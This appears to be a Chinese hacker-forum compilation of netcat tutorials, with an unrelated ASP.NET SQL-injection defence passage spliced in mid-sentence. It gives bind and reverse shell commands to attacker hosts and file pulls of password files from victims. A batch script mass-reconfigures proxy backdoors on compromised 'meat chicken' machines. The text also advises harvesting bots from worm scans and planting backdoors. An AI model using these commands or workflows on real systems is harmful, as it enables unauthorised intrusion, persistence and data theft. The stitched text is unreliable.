NC 工具的使用教程

时间:2022-08-02 22:27:05
NC工具的使用说明...
nc使用说明

参数介绍: 
nc.exe -h即可看到各参数的使用方法。 
基本格式:nc [-options] hostname port[s] [ports] ... 
nc -l -p port [options] [hostname] [port]

-d 后台模式 
-e prog 程序重定向,一旦连接,就执行 [危险!!] 
-g gateway source-routing hop point[s], up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h 帮助信息 
-i secs 延时的间隔 
-l 监听模式,用于入站连接 
-L 连接关闭后,仍然继续监听 
-n 指定数字的IP地址,不能用hostname 
-o file 记录16进制的传输 
-p port 本地端口号 
-r 随机本地及远程端口 
-s addr 本地源地址 
-t 使用TELNET交互方式 
-u UDP模式 
-v 详细输出--用两个-v可得到更详细的内容 
-w secs timeout的时间 
-z 将输入输出关掉--用于扫描时

端口的表示方法可写为M-N的范围格式。

===========================================================================================
基本用法:

大概有以下几种用法:

1)连接到REMOTE主机,例子: 
格式:nc -nvv 192.168.x.x 80 
讲解:连到192.168.x.x的TCP80端口

2)监听LOCAL主机,例子: 
格式:nc -l -p 80 
讲解:监听本机的TCP80端口

3)扫描远程主机,例子: 
格式:nc -nvv -w2 -z 192.168.x.x 80-445 
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL,例子: 
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe 
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接,例子: 
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法(其实NC的用法还有很多, 
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......)。

=========================================================================================== 
高级用法:

6)作攻击程序用,例子: 
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt (抓包改包后存在txt文件再上传)
讲解:连接到192.168.x.x的80端口,并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果, 
真是有异曲同工之妙:P)

附:c:exploit.txt为shellcode等

7)作蜜罐用[1],例子: 
格式:nc -L -p 80 
讲解:使用-L(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止

8)作蜜罐用[2],例子: 
格式:nc -L -p 80 > c:log.txt 
讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到c:log.txt中,如果把‘>’ 
改为‘>>’即可以追加日志

附:c:log.txt为日志等

9)作蜜罐用[3],例子:

格式1:nc -L -p 80 < c:honeypot.txt

格式2:type.exe c:honeypot.txt|nc -L -p 80

讲解:使用-L可以不停地监听某一个端口,直到ctrl+c为止,并把c:honeypot.txt的内容‘送’入其管道中如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询,他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能,欺骗系统授予访问权限。

系统环境不同,攻击者可能造成的损害也不同,这主要由应用访问数据库的安全权限决定。如果用户的帐户具有管理员或其他比较高级的权限,攻击者就可能对数据库的表执行各种他想要做的操作,包括添加、删除或更新数据,甚至可能直接删除表。

二、如何防范?
好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。

⑴ 对于动态构造SQL查询的场合,可以使用下面的技术:

第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“Select * from Users Where login = or 1=1 AND password = or 1=1”显然会得到与“Select * from Users Where login = or 1=1 AND password = or 1=1”不同的结果。

第二:删除用户输入内容中的所有连字符,防止攻击者构造出类如“Select * from Users Where login = mas -- AND password =”之类的查询,因为这类查询的后半部分已经被注释掉,不再有效,攻击者只要知道一个合法的用户登录名称,根本不需要知道用户的密码就可以顺利获得访问权限。

第三:对于用来执行查询的数据库帐户,限制其权限。用不同的用户帐户执行查询、插入、更新、删除操作。由于隔离了不同帐户可执行的操作,因而也就防止了原本用于执行Select命令的地方却被用于执行Insert、Update或Delete命令。

⑵ 用存储过程来执行所有的查询。SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外,它还使得数据库权限可以限制到只允许特定的存储过程执行,所有的用户输入必须遵从被调用的存储过程的安全上下文,这样就很难再发生注入式攻击了。

⑶ 限制表单或查询字符串输入的长度。如果用户的登录名字最多只有10个字符,那么不要认可表单中输入的10个以上的字符,这将大大增加攻击者在SQL命令中插入有害代码的难度。

⑷ 检查用户输入的合法性,确信输入的内容只包含合法的数据。数据检查应当在客户端和服务器端都执行——之所以要执行服务器端验证,是为了弥补客户端验证机制脆弱的安全性。

在客户端,攻击者完全有可能获得网页的源代码,修改验证合法性的脚本(或者直接删除脚本),然后将非法内容通过修改后的表单提交给服务器。因此,要保证验证操作确实已经执行,唯一的办法就是在服务器端也执行验证。你可以使用许多内建的验证对象,例如RegularExpressionValidator,它们能够自动生成验证用的客户端脚本,当然你也可以插入服务器端的方法调用。如果找不到现成的验证对象,你可以通过CustomValidator自己创建一个。

⑸ 将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,这相当于对用户输入的数据进行了“消毒”处理,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。System.Web.Security.formsAuthentication类有一个HashPasswordForStoringInConfigFile,非常适合于对输入数据进行消毒处理。

⑹ 检查提取数据的查询所返回的记录数量。如果程序只要求返回一个记录,但实际返回的记录却超过一行,那就当作出错处理。

参数解释: 
-e 程序重定向 
-t 用telnet来回应 
-l   监听本地端口 
-p   指定本地端口 
-v   获得端口信息 
-vv   获得详细的端口信息 
-z   关闭输入输出 
-n   指定IP地址 
-w 设定超时时间 
-u   UDP端口

我就知道这么些参数 了: 
第一个: 
nc -l -v -p 7626 
这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了

如果要监视是否有入侵本地80端口的行为,并记下来,用这个命令: 
nc -l -p 80 >>c:\\日志.dat 
这样,凡是有针对本机80端口的攻击都会被记录下来的

二、 
如果你通过溢出进入了别人的机器,就可以运行: 
nc -l -p 123 -e cmd.exe 
或者是: nc -l -p 123 -t 
作用都是以cmd.exe来响应到机器上123端口的连接 
这样就把溢出的主机变成了一台telnet肉鸡了啊 
你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 
在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777 
再在本地机器上运行: nc -l -p 777 
意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口 
你再在本地机上监听777端口,这样就进入了对方的cmd了 
这也微十时毫 反弹端口式木马的原理了。

三、 
用这个命令: 
nc -v 192.168.0.25 80 
就获得了192.168.0.25的80端口的信息 
可以获得IIS版本等很多重要信息 的

四、 
你也可以将NC作为扫描器使用: 
nc -v -z 192.168.0.25 1-100 
扫描192.168.0.25的1到100间的TCP端口

用nc -v -z -u 192.168.0.25 1-100 
这是扫描1到00间的UDP端口

[/td][/tr][tr][td] [/td][/tr][/table]
[/table]
 

[table=98%]

[table=98%][tr][td]第[1]楼[/td][/tr][tr][td]文章结构:

  0. 写在前面的话 
  1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息 
  2. Netcat 1.10 for NT 帮助信息 
  3. Netcat 1.10 常用的命令格式 
  4. 管理肉鸡,更改肉鸡设置 
  5. 下载连接 
  6. 后记

######################################## 
0. 写在前面的话 
########################################

  最近工作比较空闲,老是想着怎么自动telnet肉鸡,自动执行命令。来管理自己的肉鸡。自己写一个程序。功底是不够的,所以只有看了看nc的帮助信息,虽然只看了个半懂,但是借助于金山词霸2002版本, 还是明白了一点东西.

  我觉的有必要再总结一下.反正主要是满足我自己的需要.

######################################## 
1. Netcat 1.10 for NT - nc11nt.zip 
########################################

Basic Features

* Outbound or inbound connections, TCP or UDP, to or from any ports 
* Full DNS forward/reverse checking, with appropriate warnings 
* Ability to use any local source port 
* Ability to use any locally-configured network source address 
* Built-in port-scanning capabilities, with randomizer 
* Can read command line arguments from standard inputb 
* Slow-send mode, one line every N seconds 
* Hex dump of transmitted and received data 
* Ability to let another program service established 
connections 
* Telnet-options responder

New for NT

* Ability to run in the background without a console window 
* Ability to restart as a single-threaded server to handle a new 
connection 
________________________________________________________________________ 
Some of the features of netcat are:

Outbound or inbound connections, TCP or UDP, to or from any ports 
Full DNS forward/reverse checking, with appropriate warnings 
Ability to use any local source port 
Ability to use any locally-configured network source address 
Built-in port-scanning capabilities, with randomizer 
Built-in loose source-routing capability 
Can read command line arguments from standard input 
Slow-send mode, one line every N seconds 
Optional ability to let another program service inbound connections

Some of the potential uses of netcat:

Script backends 
Scanning ports and inventorying services 
Backup handlers 
File transfers 
Server testing and simulation 
Firewall testing 
Proxy gatewaying 
Network performance testing 
Address spoofing tests 
Protecting X servers 
1001 other uses you`ll likely come up with

Netcat + Encryption = Cryptcat

  对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.1.1 NC.EXE是一个非标准的telnet客户端程序,1.2 还有一个putty.exe客户端程序,提供四种连接模式 
-raw -telnet -rlogin -ssh.

######################################## 
2. Netcat 1.10 for NT 帮助信息 
########################################

C:\WINDOWS\Desktop>nc -h 
[v1.10 NT] 
connect to somewhere: nc [-options] hostname port[s] [ports] ... 
listen for inbound: nc -l -p port [options] [hostname] [port] 
options: 
-d detach from console, background mode (后台模式) 
-e prog inbound program to exec [dangerous!!] 
-g gateway source-routing hop point[s], up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h this cruft (本帮助信息) 
-i secs delay interval for lines sent, ports scanned (延迟时间) 
-l listen mode, for inbound connects (监听模式,等待连接) 
-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听) 
-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析) 
-o file hex dump of traffic (十六进制模式输出文件,三段) 
-p port local port number (本地端口) 
-r randomize local and remote ports (随机本地远程端口) 
-s addr local source address (本地源地址) 
-t answer TELNET negotiation 
-u UDP mode 
-v verbose [use twice to be more verbose] (-vv 更多信息) 
-w secs timeout for connects and final net reads 
-z zero-I/O mode [used for scanning] (扫描模式,-vv) 
port numbers can be individual or ranges: m-n [inclusive]

######################################## 
3. Netcat 1.10 常用的命令格式 
########################################

  下面引用 《沉睡不醒 10月15日凌晨》的文章的部分。

3.1.端口的刺探:

nc -vv ip port 
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open

3.2.扫描器

nc -vv -w 5 ip port-port port 
nc -vv -z ip port-port port

  这样扫描会留下大量的痕迹,系统管理员会额外小心。

3.3. 后门

victim machine: //受害者的机器 
nc -l -p port -e cmd.exe //win2000 
nc -l -p port -e /bin/sh //unix,Linux 
attacker machine: //攻击者的机器. 
nc ip -p port //连接victim_IP,然后得到一个shell。

3.4.反向连接 
attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击. 
//或者wollf的反向连接. 
nc -vv -l -p port 
victim machine: 
nc -e cmd.exe attacker ip -p port 
nc -e /bin/sh attacker ip -p port

或者:

attacker machine: 
nc -vv -l -p port1 /*用于输入*/ 
nc -vv -l -p prot2 /*用于显示*/ 
victim machine: 
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2 
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

  139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP),这样就可以保证nc.exe优先于NETBIOS。

3.5.传送文件:

3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来. 
nc -d -l -p port < path\filedest     /*attacker machine*/ 可以shell执行 
nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl+C退出 
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

3.5.2 attacker machine --> victim machine //上传命令文件到肉鸡 
nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出 
nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell执行 
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

  结论: 可以传输ascii,bin文件.可以传输程序文件.

  问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?

3.6 端口数据抓包.

nc -vv -w 2 -o test.txt xfocus.Net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error 
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr 
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized... 
< 00000084 83 00 00 01 8f # .....

3.7 telnet,自动批处理。 ★★★★★我要重点推荐的东西就是这个.

nc victim_ip port < path\file.cmd   /*victim machine*/ 显示执行过程. 
nc -vv victim_ip port < path\file.cmd   /*victim machine*/ 显示执行过程.

nc -d victim_ip port < path\file.cmd 安静模式.

_______________file.cmd________________________ 
password 
cd %windir% 
echo []=[%windir%] 
c: 
cd \ 
md test 
cd /d %windir%\system32\ 
net stop sksockserver 
snake.exe -config port 11111 
net start sksockserver 
exit 
_______________file.cmd__END___________________

######################################## 
4. 管理肉鸡,更改肉鸡设置 
########################################

4.1 比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver",使用winshell后门. 端口1234 密码password

命令格式就是:

modi.bat youip.txt

___________modi.bat____________________________ 
@if "%1"=="" echo Error: no ip.txt &&goto END

:start 
@echo password >a.cmd 
@echo s >>a.cmd 
@echo cd /d %%windir%%\system32\ >>a.cmd 
@net stop "sksockserver" >>a.cmd 
@snake.exe -config port 11111 >>a.cmd 
@net start "sksockserver" >>a.cmd 
@exit >>a.cmd

:auto 
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)

:END 
___________modi.bat__END_______________________

4.2 
@echo off 
color f0 
:start 
cls 
C:\nc -vv -w 3 -l -p 80>>80.txt 
goto start

  把防火墙关掉以后运行这个批处理,会监听到许多探测U漏洞的信息,大多是三条一组--妮姆达病毒扫描你的。这样就会得到肉鸡的.虽然质量不高.但是也是一种便宜的办法.

  肉鸡特征:

  1。unicode漏洞 
  2。guest密码为空,administrators组用户 
  3。其他漏洞

  自己慢慢的爽去吧。不过,再次强调一句,不建议而且是不能破坏国内主机,上去以后将tftp.exe改名。然后用pskill干掉mmc.exe进程,之后是杀毒。做好后门以后,将guest帐号停用,以对付傻瓜扫描器

######################################## 
5. 下载连接 
########################################

http://www.coolersky.com/Download/Hacker/Back-door/nc.rar

######################################## 
6. 补充 
########################################

以下为NetCat的Unix版本使用方法(转载): 
http://www.xfocus.net/articles/200103/88.html

-------------------------------------- 
nc使用技巧

by quack<>

http://www.xfocus.org ;安全焦点

  nc这个小玩意儿应该大家耳熟能详,也用了N年了吧……这里不多讲废话,结合一些script说说它的使用技巧。

(文中所举的script都来自于nc110.tgz的文件包)

一、基本使用:

Quack# nc -h 
[v1.10] 
  想要连接到某处: nc [-options] hostname port[s] [ports] ... 
  绑定端口等待连接:   nc -l -p port [-options] [hostname] [port] 
  参数: 
    -e prog         程序重定向,一旦连接,就执行 [危险!!] 
    -g gateway       source-routing hop point[s], up to 8 
    -G num         source-routing pointer: 4, 8, 12, ... 
    -h           帮助信息 
    -i secs         延时的间隔 
    -l           监听模式,用于入站连接 
    -n           指定数字的IP地址,不能用hostname 
    -o file         记录16进制的传输 
    -p port         本地端口号 
    -r           任意指定本地及远程端口 
    -s addr         本地源地址 
    -u           UDP模式 
    -v           详细输出——用两个-v可得到更详细的内容 
    -w secs         timeout的时间 
    -z           将输入输出关掉——用于扫描时

  其中端口号可以指定一个或者用lo-hi式的指定范围。

二、用于传输文件——ncp

#! /bin/sh 
## 类似于rcp,但是是用netcat在高端口做的 
## 在接收文件的机器上做"ncp targetfile" 
## 在发送文件的机器上做"ncp sourcefile receivinghost" 
## 如果调用了 "nzp" ,会将传输文件压缩

## 这里定义你想使用的端口,可以*选择 
MYPORT=23456

## 如果nc没有在系统路径中的话,要把下面一行注释去掉,加以修改 
# PATH=$:$ ; export PATH

## 下面这几行检查参数输入情况:

test "$3" && echo "too many args" && exit 1 
test ! "$1" && echo "no args?" && exit 1 
me=`echo $0 | sed s+.*/++` 
test "$me" = "nzp" && echo [compressed mode]

# if second arg, its a host to send an [extant] file to. 
if test "$2" ; then 
test ! -f "$1" && echo "cant find $1" && exit 1 
if test "$me" = "nzp" ; then 
  compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0 
else 
  nc -v -w 2 $2 $MYPORT < "$1" && exit 0 
fi 
echo "transfer FAILED!" 
exit 1 
fi

# 是否在接收文件机器当前目录有同名文件

if test -f "$1" ; then 
echo -n "Overwrite $1? " 
read aa 
test ! "$aa" = "y" && echo "[punted!]" && exit 1 
fi 
# 30 seconds oughta be pleeeeenty of time, but change if you want. 
if test "$me" = "nzp" ; then 
# 注意这里nc的用法,结合了重定向符号和管道 
nc -v -w 30 -p $MYPORT -l "$1" && exit 0 
else 
nc -v -w 30 -p $MYPORT -l "$1" && exit 0 
fi 
echo "transfer FAILED!" 
# clean up, since even if the transfer failed, $1 is already trashed 
rm -f "$1" 
exit 1

这样的话,我只要在A机器上先 QuackA# ncp ../abcd 
listening on 然后在另一台机器B上 
QuackB#ncp abcd 192.168.0.2 
quackb [192.168.0.1] 23456 (?) 
A机上出现 
open connect to [192.168.0.2] from quackb [192.168.0.1] 1027 
#

  查看一下,文件传输完毕。

三、用于绑定端口——bsh

  首先要清楚,如果你编译netcat时仅用如make freebsd之类的命令来编译的话,这个工具是无法利用的——要define一个GAPING_SECURITY_HOLE它才会提供-e选项。

#! /bin/sh 
## 一个利用nc的绑定shell并且带有密码保护的脚本 
## 带有一个参数,即端口号

NC=nc

case "$1" in 
?* ) 
LPN="$1" 
export LPN 
sleep 1 
#注意这里nc的用法,参数-l是lister,-e是执行重定向 
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 & 
echo "launched on port $LPN" 
exit 0 
;; 
esac

# here we play inetd 
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1

while read qq ; do 
case "$qq" in 
# 这里就是弱密码保护了,密码是quack 
quack ) 
cd / 
exec csh -i 
;; 
esac 
done

要看看它是怎么使用的么?

quack# ./bsh 6666 <-------输入,后面是程序输出 
-l -p 6666 -e ./bsh 
launched on port 6666 
quack# 
quack## nc localhost 6666 <----------输入 
-l -p 6666 -e ./bsh 
quack  <----------输入,密码验证 
Warning: imported path contains relative components 
Warning: no access to tty (Bad file descriptor). 
Thus no job control in this shell. 
Cracker#

四、 用于端口扫描——probe

  在我们常见的一些端口扫描程序中,如Vetescan这类以shell script写成的话,很多都需要系统中装有netcat,原因何在呢?看看下面的script,你或许会明白一些。

#! /bin/sh 
## launch a whole buncha shit at yon victim in no particular order; capture 
## stderr+stdout in one place. Run as root for rservice and low -p to work. 
## Fairly thorough example of using netcat to collect a lot of host info. 
## Will set off every intrusion alarm in existence on a paranoid machine!

# 该目录里有一些小工具 
DDIR=../data 
# 指定网关 
GATE=192.157.69.11

# might conceivably wanna change this for different run styles 
UCMD=nc -v -w 8

test ! "$1" && echo Needs victim arg && exit 1

echo | $UCMD -w 9 -r "$1" 13 79 6667 2>&1 
echo 0 | $UCMD "$1" 79 2>&1 
# if LSRR was passed thru, should get refusal here: 
# 要注意这里的用法,其实nc的这些参数掌握好可以做很多事情 
$UCMD -z -r -g $GATE "$1" 6473 2>&1 
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1 
# -s `hostname` may be wrong for some multihomed machines 
echo UDP echoecho! | nc -u -p 7 -s `hostname` -w 3 "$1" 7 19 2>&1 
echo 113,10158 | $UCMD -p 10158 "$1" 113 2>&1 
rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1 
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1 
# newline after any telnet trash 
echo 
echo PASV | $UCMD -r "$1" 21 2>&1 
echo GET / | $UCMD -w 10 "$1" 80 81 210 70 2>&1 
# sometimes contains useful directory info: 
# 知道robots.txt是什么文件么?;) 
echo GET /robots.txt | $UCMD -w 10 "$1" 80 2>&1 
# now the big red lights Go on 
# 利用小工具rservice来尝试,该工具可以在nc110.tgz的data目录里找到 
rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1 
rservice root root | $UCMD -r "$1" exec 2>&1 
echo BEGIN big udp -- everything may look "open" if packet-filtered 
data -g < $/nfs-0.d | $UCMD -i 1 -u "$1" 2049 | od -x 2>&1 
# no wait-time, uses RTT hack 
nc -v -z -u -r "$1" 111 66-70 88 53 87 161-164 121-123 213 49 2>&1 
nc -v -z -u -r "$1" 137-140 694-712 747-770 175-180 2103 510-530 2>&1 
echo END big udp 
$UCMD -r -z "$1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2>&1 
# Use our identd-sniffer! 
iscan "$1" 21 25 79 80 111 53 6667 6000 2049 119 2>&1 
# this gets pretty intrusive, but what the fuck. Probe for portmap first 
if nc -w 5 -z -u "$1" 111 ; then 
showmount -e "$1" 2>&1 #象showmount和rpcinfo的使用,可能会被逮到;) 
rpcinfo -p "$1" 2>&1 
fi 
exit 0

感觉也没什么好说的,脚本本身说明了一切。当然象上面的脚本只是示范性的例子,真正地使用时,这样扫描会留下大量的痕迹,系统管理员会额外小心;)

多试试,多想想,可能你可以用它来做更多事情——你可以参见nc110.tgz里script目录下的那些脚本,从中获得一些思路.